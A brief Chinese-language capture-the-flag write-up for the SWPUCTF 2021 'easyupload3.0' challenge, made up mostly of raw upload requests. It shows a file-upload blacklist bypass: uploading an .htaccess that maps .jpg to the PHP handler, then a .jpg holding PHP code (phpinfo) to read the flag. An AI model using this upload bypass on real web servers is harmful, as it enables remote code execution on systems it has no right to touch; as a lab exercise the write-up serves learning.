[SWPUCTF 2021 新生赛]easyupload3.0
play
- 黑白名单判断
------WebKitFormBoundaryzIbFCTQsOMeWfYK5
Content-Disposition: form-data; name="uploaded"; filename="sqzr.paaaaaaa"
Content-Type: application/octet-stream
响应
<meta charset="utf-8">./upload/sqzr.paaaaaaa succesfully uploaded!
说明是黑名单校验
-
尝试后缀绕过,发现行不通
-
htaccess
------WebKitFormBoundaryzIbFCTQsOMeWfYK5
Content-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/jpeg
AddType application/x-httpd-php .jpg
------WebKitFormBoundaryzIbFCTQsOMeWfYK5
Content-Disposition: form-data; name="uploaded"; filename="1.jpg"
Content-Type: image/jpeg
<?php phpinfo(); ?>
phpinfo里找到flag
知识点
- htaccess